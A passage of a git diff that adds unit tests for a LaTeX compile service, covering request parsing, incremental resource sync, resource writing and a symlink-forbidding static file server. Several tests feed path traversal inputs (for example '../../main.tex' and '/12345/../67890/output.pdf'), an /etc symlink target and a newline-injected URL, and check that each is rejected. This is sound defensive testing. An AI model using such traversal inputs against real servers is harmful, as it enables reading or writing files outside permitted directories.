+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the timeout to MAX_TIMEOUT', function () {
+ this.data.timeout.should.equal(this.RequestParser.MAX_TIMEOUT * 1000)
+ })
+ })
+
+ describe('with a timeout', function () {
+ beforeEach(function (done) {
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the timeout (in milliseconds)', function () {
+ this.data.timeout.should.equal(
+ this.validRequest.compile.options.timeout * 1000
+ )
+ })
+ })
+
+ describe('with a resource without a path', function () {
+ beforeEach(function () {
+ delete this.validResource.path
+ this.validRequest.compile.resources.push(this.validResource)
+ this.RequestParser.parse(this.validRequest, this.callback)
+ })
+
+ it('should return an error', function () {
+ this.callback
+ .calledWithMatch({
+ message: 'all resources should have a path attribute',
+ })
+ .should.equal(true)
+ })
+ })
+
+ describe('with a resource with a path', function () {
+ beforeEach(function () {
+ this.validResource.path = this.path = 'test.tex'
+ this.validRequest.compile.resources.push(this.validResource)
+ this.RequestParser.parse(this.validRequest, this.callback)
+ this.data = this.callback.args[0][1]
+ })
+
+ it('should return the path in the parsed response', function () {
+ this.data.resources[0].path.should.equal(this.path)
+ })
+ })
+
+ describe('with a resource with a malformed modified date', function () {
+ beforeEach(function () {
+ this.validResource.modified = 'not-a-date'
+ this.validRequest.compile.resources.push(this.validResource)
+ this.RequestParser.parse(this.validRequest, this.callback)
+ })
+
+ it('should return an error', function () {
+ this.callback
+ .calledWithMatch({
+ message:
+ 'resource modified date could not be understood: ' +
+ this.validResource.modified,
+ })
+ .should.equal(true)
+ })
+ })
+
+ describe('with a valid buildId', function () {
+ beforeEach(function (done) {
+ this.validRequest.compile.options.buildId = '195a4869176-a4ad60bee7bf35e4'
+ this.RequestParser.parse(this.validRequest, (error, data) => {
+ if (error) return done(error)
+ this.data = data
+ done()
+ })
+ })
+
+ it('should set the buildId', function () {
+ this.data.buildId.should.equal('195a4869176-a4ad60bee7bf35e4')
+ })
+ })
+
+ describe('with a bad buildId', function () {
+ beforeEach(function () {
+ this.validRequest.compile.options.buildId = 'foo/bar'
+ this.RequestParser.parse(this.validRequest, this.callback)
+ })
+
+ it('should return an error', function () {
+ this.callback
+ .calledWithMatch({
+ message:
+ 'buildId attribute does not match regex /^[0-9a-f]+-[0-9a-f]+$/',
+ })
+ .should.equal(true)
+ })
+ })
+
+ describe('with a resource with a valid date', function () {
+ beforeEach(function () {
+ this.date = '12:00 01/02/03'
+ this.validResource.modified = this.date
+ this.validRequest.compile.resources.push(this.validResource)
+ this.RequestParser.parse(this.validRequest, this.callback)
+ this.data = this.callback.args[0][1]
+ })
+
+ it('should return the date as a Javascript Date object', function () {
+ ;(this.data.resources[0].modified instanceof Date).should.equal(true)
+ this.data.resources[0].modified
+ .getTime()
+ .should.equal(Date.parse(this.date))
+ })
+ })
+
+ describe('with a resource without either a content or URL attribute', function () {
+ beforeEach(function () {
+ delete this.validResource.url
+ delete this.validResource.content
+ this.validRequest.compile.resources.push(this.validResource)
+ this.RequestParser.parse(this.validRequest, this.callback)
+ })
+
+ it('should return an error', function () {
+ this.callback
+ .calledWithMatch({
+ message:
+ 'all resources should have either a url or content attribute',
+ })
+ .should.equal(true)
+ })
+ })
+
+ describe('with a resource where the content is not a string', function () {
+ beforeEach(function () {
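+ // an array is truthy but not a string, so the parser's type check should reject it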
+ this.validResource.content = [] + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'content attribute should be a string' }) + .should.equal(true) + }) + }) + + describe('with a resource where the url is not a string', function () { + beforeEach(function () { + this.validResource.url = [] + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'url attribute should be a string' }) + .should.equal(true) + }) + }) + + describe('with a resource with a url', function () { + beforeEach(function () { + this.validResource.url = this.url = 'www.example.com' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the url in the parsed response', function () { + this.data.resources[0].url.should.equal(this.url) + }) + }) + + describe('with a resource with a content attribute', function () { + beforeEach(function () { + this.validResource.content = this.content = 'Hello world' + this.validRequest.compile.resources.push(this.validResource) + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the content in the parsed response', function () { + this.data.resources[0].content.should.equal(this.content) + }) + }) + + describe('without a root resource path', function () { + beforeEach(function () { + delete this.validRequest.compile.rootResourcePath + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it("should set the root resource path to 'main.tex' by default", function () { + this.data.rootResourcePath.should.equal('main.tex') + }) + }) + + describe('with a root resource path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = this.path = 'test.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return the root resource path in the parsed response', function () { + this.data.rootResourcePath.should.equal(this.path) + }) + }) + + describe('with a root resource path that is not a string', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = [] + this.RequestParser.parse(this.validRequest, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: 'rootResourcePath attribute should be a string', + }) + .should.equal(true) + }) + }) + + describe('with a root resource path that has a relative path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = 'foo/../../bar.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'relative path in root resource' }) + .should.equal(true) + }) + }) + + describe('with a root resource path that has unescaped + relative path', function () { + beforeEach(function () { + this.validRequest.compile.rootResourcePath = 'foo/../bar.tex' + this.RequestParser.parse(this.validRequest, this.callback) + this.data 
= this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ message: 'relative path in root resource' }) + .should.equal(true) + }) + }) + + describe('with an unknown syncType', function () { + beforeEach(function () { + this.validRequest.compile.options.syncType = 'unexpected' + this.RequestParser.parse(this.validRequest, this.callback) + this.data = this.callback.args[0][1] + }) + + it('should return an error', function () { + this.callback + .calledWithMatch({ + message: 'syncType attribute should be one of: full, incremental', + }) + .should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ResourceStateManagerTests.js b/services/clsi/test/unit/js/ResourceStateManagerTests.js new file mode 100644 index 0000000..823c816 --- /dev/null +++ b/services/clsi/test/unit/js/ResourceStateManagerTests.js @@ -0,0 +1,241 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ResourceStateManager' +) +const Path = require('node:path') +const Errors = require('../../../app/js/Errors') + +describe('ResourceStateManager', function () { + beforeEach(function () { + this.ResourceStateManager = SandboxedModule.require(modulePath, { + singleOnly: true, + requires: { + fs: (this.fs = {}), + './SafeReader': (this.SafeReader = {}), + }, + }) + this.basePath = '/path/to/write/files/to' + this.resources = [ + { path: 'resource-1-mock' }, + { path: 'resource-2-mock' }, + { path: 'resource-3-mock' }, + ] + this.state = '1234567890' + this.resourceFileName = `${this.basePath}/.project-sync-state` + this.resourceFileContents = `${this.resources[0].path}\n${this.resources[1].path}\n${this.resources[2].path}\nstateHash:${this.state}` + return (this.callback = sinon.stub()) + }) + + describe('saveProjectState', function () { + beforeEach(function () { + return (this.fs.writeFile = sinon.stub().callsArg(2)) + }) + + describe('when the state is specified', function () { + beforeEach(function () { + return this.ResourceStateManager.saveProjectState( + this.state, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should write the resource list to disk', function () { + return this.fs.writeFile + .calledWith(this.resourceFileName, this.resourceFileContents) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('when the state is undefined', function () { + beforeEach(function () { + this.state = undefined + this.fs.unlink = sinon.stub().callsArg(1) + return this.ResourceStateManager.saveProjectState( + this.state, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should unlink the resource file', function () { + return this.fs.unlink + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + it('should not write the resource list to disk', function () { + return this.fs.writeFile.called.should.equal(false) + }) + + return it('should call the callback', function () { + return 
this.callback.called.should.equal(true) + }) + }) + }) + + describe('checkProjectStateMatches', function () { + describe('when the state matches', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .callsArgWith(3, null, this.resourceFileContents) + return this.ResourceStateManager.checkProjectStateMatches( + this.state, + this.basePath, + this.callback + ) + }) + + it('should read the resource file', function () { + return this.SafeReader.readFile + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + return it('should call the callback with the results', function () { + return this.callback + .calledWithMatch(null, this.resources) + .should.equal(true) + }) + }) + + describe('when the state file is not present', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon.stub().callsArg(3) + return this.ResourceStateManager.checkProjectStateMatches( + this.state, + this.basePath, + this.callback + ) + }) + + it('should read the resource file', function () { + return this.SafeReader.readFile + .calledWith(this.resourceFileName) + .should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('invalid state for incremental update') + }) + }) + + return describe('when the state does not match', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .callsArgWith(3, null, this.resourceFileContents) + return this.ResourceStateManager.checkProjectStateMatches( + 'not-the-original-state', + this.basePath, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('invalid state for incremental update') + }) + }) + }) + + return describe('checkResourceFiles', function () { + describe('when all the files are present', function () { + beforeEach(function () { + this.allFiles = [ + this.resources[0].path, + this.resources[1].path, + this.resources[2].path, + ] + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + this.callback + ) + }) + + return it('should call the callback', function () { + return this.callback.calledWithExactly().should.equal(true) + }) + }) + + describe('when there is a missing file', function () { + beforeEach(function () { + this.allFiles = [this.resources[0].path, this.resources[1].path] + this.fs.stat = sinon.stub().callsArgWith(1, new Error()) + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match(Errors.FilesOutOfSyncError)) + .should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include( + 'resource files missing in incremental update' + ) + }) + }) + + return describe('when a resource contains a relative path', function () { + beforeEach(function () { + this.resources[0].path = '../foo/bar.tex' + this.allFiles = [ + this.resources[0].path, + this.resources[1].path, + this.resources[2].path, + ] + return this.ResourceStateManager.checkResourceFiles( + this.resources, + this.allFiles, + this.basePath, + 
this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('relative path in resource file list') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ResourceWriterTests.js b/services/clsi/test/unit/js/ResourceWriterTests.js new file mode 100644 index 0000000..c2e09ce --- /dev/null +++ b/services/clsi/test/unit/js/ResourceWriterTests.js @@ -0,0 +1,532 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS206: Consider reworking classes to avoid initClass + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ResourceWriter' +) +const path = require('node:path') + +describe('ResourceWriter', function () { + beforeEach(function () { + let Timer + this.ResourceWriter = SandboxedModule.require(modulePath, { + singleOnly: true, + requires: { + fs: (this.fs = { + mkdir: sinon.stub().callsArg(1), + unlink: sinon.stub().callsArg(1), + }), + './ResourceStateManager': (this.ResourceStateManager = {}), + './UrlCache': (this.UrlCache = { + createProjectDir: sinon.stub().yields(), + }), + './OutputFileFinder': (this.OutputFileFinder = {}), + './Metrics': (this.Metrics = { + inc: sinon.stub(), + Timer: (Timer = (function () { + Timer = class Timer { + static initClass() { + this.prototype.done = sinon.stub() + } + } + Timer.initClass() + return Timer + })()), + }), + }, + }) + this.project_id = 'project-id-123' + this.basePath = '/path/to/write/files/to' + return (this.callback = sinon.stub()) + }) + + describe('syncResourcesToDisk on a full request', function () { + beforeEach(function () { + this.resources = ['resource-1-mock', 'resource-2-mock', 'resource-3-mock'] + this.request = { + project_id: this.project_id, + syncState: (this.syncState = '0123456789abcdef'), + resources: this.resources, + } + this.ResourceWriter._writeResourceToDisk = sinon.stub().callsArg(3) + this.ResourceWriter._removeExtraneousFiles = sinon.stub().yields(null) + this.ResourceStateManager.saveProjectState = sinon.stub().callsArg(3) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + this.callback + ) + }) + + it('should remove old files', function () { + return this.ResourceWriter._removeExtraneousFiles + .calledWith(this.request, this.resources, this.basePath) + .should.equal(true) + }) + + it('should write each resource to disk', function () { + return Array.from(this.resources).map(resource => + this.ResourceWriter._writeResourceToDisk + .calledWith(this.project_id, resource, this.basePath) + .should.equal(true) + ) + }) + + it('should store the sync state and resource list', function () { + return this.ResourceStateManager.saveProjectState + .calledWith(this.syncState, this.resources, this.basePath) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('syncResourcesToDisk on an incremental update', function () { + 
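+ // incremental sync reuses the previous output: the stored sync state must
+ // match before only the resources listed in the request are rewritten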
beforeEach(function () { + this.resources = ['resource-1-mock'] + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.fullResources = this.resources.concat(['file-1']) + this.ResourceWriter._writeResourceToDisk = sinon.stub().callsArg(3) + this.ResourceWriter._removeExtraneousFiles = sinon + .stub() + .yields(null, (this.outputFiles = []), (this.allFiles = [])) + this.ResourceStateManager.checkProjectStateMatches = sinon + .stub() + .callsArgWith(2, null, this.fullResources) + this.ResourceStateManager.saveProjectState = sinon.stub().callsArg(3) + this.ResourceStateManager.checkResourceFiles = sinon.stub().callsArg(3) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + this.callback + ) + }) + + it('should check the sync state matches', function () { + return this.ResourceStateManager.checkProjectStateMatches + .calledWith(this.syncState, this.basePath) + .should.equal(true) + }) + + it('should remove old files', function () { + return this.ResourceWriter._removeExtraneousFiles + .calledWith(this.request, this.fullResources, this.basePath) + .should.equal(true) + }) + + it('should check each resource exists', function () { + return this.ResourceStateManager.checkResourceFiles + .calledWith(this.fullResources, this.allFiles, this.basePath) + .should.equal(true) + }) + + it('should write each resource to disk', function () { + return Array.from(this.resources).map(resource => + this.ResourceWriter._writeResourceToDisk + .calledWith(this.project_id, resource, this.basePath) + .should.equal(true) + ) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + describe('syncResourcesToDisk on an incremental update when the state does not match', function () { + beforeEach(function () { + this.resources = ['resource-1-mock'] + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.ResourceStateManager.checkProjectStateMatches = sinon + .stub() + .callsArgWith(2, (this.error = new Error())) + return this.ResourceWriter.syncResourcesToDisk( + this.request, + this.basePath, + this.callback + ) + }) + + it('should check whether the sync state matches', function () { + return this.ResourceStateManager.checkProjectStateMatches + .calledWith(this.syncState, this.basePath) + .should.equal(true) + }) + + return it('should call the callback with an error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('_removeExtraneousFiles', function () { + beforeEach(function () { + this.output_files = [ + { + path: 'output.pdf', + type: 'pdf', + }, + { + path: 'extra/file.tex', + type: 'tex', + }, + { + path: 'extra.aux', + type: 'aux', + }, + { + path: 'cache/_chunk1', + }, + { + path: 'figures/image-eps-converted-to.pdf', + type: 'pdf', + }, + { + path: 'foo/main-figure0.md5', + type: 'md5', + }, + { + path: 'foo/main-figure0.dpth', + type: 'dpth', + }, + { + path: 'foo/main-figure0.pdf', + type: 'pdf', + }, + { + path: '_minted-main/default-pyg-prefix.pygstyle', + type: 'pygstyle', + }, + { + path: '_minted-main/default.pygstyle', + type: 'pygstyle', + }, + { + path: '_minted-main/35E248B60965545BD232AE9F0FE9750D504A7AF0CD3BAA7542030FC560DFCC45.pygtex', + type: 'pygtex', + }, + { + path: 
'_markdown_main/30893013dec5d869a415610079774c2f.md.tex', + type: 'tex', + }, + { + path: 'output.stdout', + }, + { + path: 'output.stderr', + }, + ] + this.resources = 'mock-resources' + this.request = { + project_id: this.project_id, + syncType: 'incremental', + syncState: (this.syncState = '1234567890abcdef'), + resources: this.resources, + } + this.OutputFileFinder.findOutputFiles = sinon + .stub() + .callsArgWith(2, null, this.output_files) + this.ResourceWriter._deleteFileIfNotDirectory = sinon.stub().callsArg(1) + return this.ResourceWriter._removeExtraneousFiles( + this.request, + this.resources, + this.basePath, + this.callback + ) + }) + + it('should find the existing output files', function () { + return this.OutputFileFinder.findOutputFiles + .calledWith(this.resources, this.basePath) + .should.equal(true) + }) + + it('should delete the output files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.pdf')) + .should.equal(true) + }) + + it('should delete the stdout log file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.stdout')) + .should.equal(true) + }) + + it('should delete the stderr log file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'output.stderr')) + .should.equal(true) + }) + + it('should delete the extra files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'extra/file.tex')) + .should.equal(true) + }) + + it('should not delete the extra aux files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'extra.aux')) + .should.equal(false) + }) + + it('should not delete the knitr cache file', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'cache/_chunk1')) + .should.equal(false) + }) + + it('should not delete the epstopdf converted files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join(this.basePath, 'figures/image-eps-converted-to.pdf') + ) + .should.equal(false) + }) + + it('should not delete the tikz md5 files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.md5')) + .should.equal(false) + }) + + it('should not delete the tikz dpth files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.dpth')) + .should.equal(false) + }) + + it('should not delete the tikz pdf files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, 'foo/main-figure0.pdf')) + .should.equal(false) + }) + + it('should not delete the minted pygstyle files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join(this.basePath, '_minted-main/default-pyg-prefix.pygstyle') + ) + .should.equal(false) + }) + + it('should not delete the minted default pygstyle files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith(path.join(this.basePath, '_minted-main/default.pygstyle')) + .should.equal(false) + }) + + it('should not delete the minted default pygtex files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join( + this.basePath, + 
'_minted-main/35E248B60965545BD232AE9F0FE9750D504A7AF0CD3BAA7542030FC560DFCC45.pygtex' + ) + ) + .should.equal(false) + }) + + it('should not delete the markdown md.tex files', function () { + return this.ResourceWriter._deleteFileIfNotDirectory + .calledWith( + path.join( + this.basePath, + '_markdown_main/30893013dec5d869a415610079774c2f.md.tex' + ) + ) + .should.equal(false) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should time the request', function () { + return this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('_writeResourceToDisk', function () { + describe('with a url based resource', function () { + beforeEach(function () { + this.fs.mkdir = sinon.stub().callsArg(2) + this.resource = { + path: 'main.tex', + url: 'http://www.example.com/primary/main.tex', + fallbackURL: 'http://fallback.example.com/fallback/main.tex', + modified: Date.now(), + } + this.UrlCache.downloadUrlToFile = sinon + .stub() + .callsArgWith(5, 'fake error downloading file') + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should ensure the directory exists', function () { + this.fs.mkdir + .calledWith( + path.dirname(path.join(this.basePath, this.resource.path)) + ) + .should.equal(true) + }) + + it('should write the URL from the cache', function () { + return this.UrlCache.downloadUrlToFile + .calledWith( + this.project_id, + this.resource.url, + this.resource.fallbackURL, + path.join(this.basePath, this.resource.path), + this.resource.modified + ) + .should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should not return an error if the resource writer errored', function () { + return expect(this.callback.args[0][0]).not.to.exist + }) + }) + + describe('with a content based resource', function () { + beforeEach(function () { + this.resource = { + path: 'main.tex', + content: 'Hello world', + } + this.fs.writeFile = sinon.stub().callsArg(2) + this.fs.mkdir = sinon.stub().callsArg(2) + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should ensure the directory exists', function () { + return this.fs.mkdir + .calledWith( + path.dirname(path.join(this.basePath, this.resource.path)) + ) + .should.equal(true) + }) + + it('should write the contents to disk', function () { + return this.fs.writeFile + .calledWith( + path.join(this.basePath, this.resource.path), + this.resource.content + ) + .should.equal(true) + }) + + return it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + }) + + return describe('with a file path that breaks out of the root folder', function () { + beforeEach(function () { + this.resource = { + path: '../../main.tex', + content: 'Hello world', + } + this.fs.writeFile = sinon.stub().callsArg(2) + return this.ResourceWriter._writeResourceToDisk( + this.project_id, + this.resource, + this.basePath, + this.callback + ) + }) + + it('should not write to disk', function () { + return this.fs.writeFile.called.should.equal(false) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + }) + + 
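+ // checkPath joins a candidate path onto the root directory and errors when
+ // the normalised result escapes it, including prefixes such as '../foobar'
+ // that merely share leading characters with the root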
return describe('checkPath', function () { + describe('with a valid path', function () { + beforeEach(function () { + return this.ResourceWriter.checkPath('foo', 'bar', this.callback) + }) + + return it('should return the joined path', function () { + return this.callback.calledWith(null, 'foo/bar').should.equal(true) + }) + }) + + describe('with an invalid path', function () { + beforeEach(function () { + this.ResourceWriter.checkPath('foo', 'baz/../../bar', this.callback) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + + describe('with another invalid path matching on a prefix', function () { + beforeEach(function () { + return this.ResourceWriter.checkPath( + 'foo', + '../foobar/baz', + this.callback + ) + }) + + it('should return an error', function () { + this.callback.calledWith(sinon.match(Error)).should.equal(true) + + const message = this.callback.args[0][0].message + expect(message).to.include('resource path is outside root directory') + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js b/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js new file mode 100644 index 0000000..53507fe --- /dev/null +++ b/services/clsi/test/unit/js/StaticServerForbidSymlinksTests.js @@ -0,0 +1,248 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join( + __dirname, + '../../../app/js/StaticServerForbidSymlinks' +) +const { expect } = require('chai') + +describe('StaticServerForbidSymlinks', function () { + beforeEach(function () { + this.settings = { + path: { + compilesDir: '/compiles/here', + }, + } + + this.fs = {} + this.ForbidSymlinks = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + fs: this.fs, + }, + }) + + this.dummyStatic = (rootDir, options) => (req, res, next) => + // console.log "dummyStatic serving file", rootDir, "called with", req.url + // serve it + next() + + this.StaticServerForbidSymlinks = this.ForbidSymlinks( + this.dummyStatic, + this.settings.path.compilesDir + ) + this.req = { + params: { + project_id: '12345', + }, + } + + this.res = {} + return (this.req.url = '/12345/output.pdf') + }) + + describe('sending a normal file through', function () { + beforeEach(function () { + return (this.fs.realpath = sinon + .stub() + .callsArgWith( + 1, + null, + `${this.settings.path.compilesDir}/${this.req.params.project_id}/output.pdf` + )) + }) + + return it('should call next', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(200) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res, done) + }) + }) + + describe('with a missing file', function () { + beforeEach(function () { + return (this.fs.realpath = sinon + .stub() + .callsArgWith( + 1, + { code: 'ENOENT' }, + 
+ `${this.settings.path.compilesDir}/${this.req.params.project_id}/unknown.pdf`
+ ))
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a new line', function () {
+ beforeEach(function () {
+ this.req.url = '/12345/output.pdf\nother file'
+ this.fs.realpath = sinon.stub().yields()
+ })
+
+ it('should process the correct file', function (done) {
+ this.res.sendStatus = () => {
+ this.fs.realpath.should.have.been.calledWith(
+ `${this.settings.path.compilesDir}/12345/output.pdf\nother file`
+ )
+ done()
+ }
+ this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a symlink file', function () {
+ beforeEach(function () {
+ return (this.fs.realpath = sinon
+ .stub()
+ .callsArgWith(1, null, `/etc/${this.req.params.project_id}/output.pdf`))
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a relative file', function () {
+ beforeEach(function () {
+ return (this.req.url = '/12345/../67890/output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with an unnormalized file containing .', function () {
+ beforeEach(function () {
+ return (this.req.url = '/12345/foo/./output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a file containing an empty path', function () {
+ beforeEach(function () {
+ return (this.req.url = '/12345/foo//output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a non-project file', function () {
+ beforeEach(function () {
+ return (this.req.url = '/.foo/output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a file outside the compiledir', function () {
+ beforeEach(function () {
+ return (this.req.url = '/../bar/output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a file with no leading /', function () {
+ beforeEach(function () {
+ return (this.req.url = './../bar/output.pdf')
+ })
+
+ return it('should send a 404', function (done) {
+ this.res.sendStatus = function (resCode) {
+ resCode.should.equal(404)
+ return done()
+ }
+ return this.StaticServerForbidSymlinks(this.req, this.res)
+ })
+ })
+
+ describe('with a github style path', function () {
+ beforeEach(function () {
+ this.req.url = '/henryoswald-latex_example/output/output.log'
+ return (this.fs.realpath = sinon
+ .stub()
+ .callsArgWith(
+ 1,
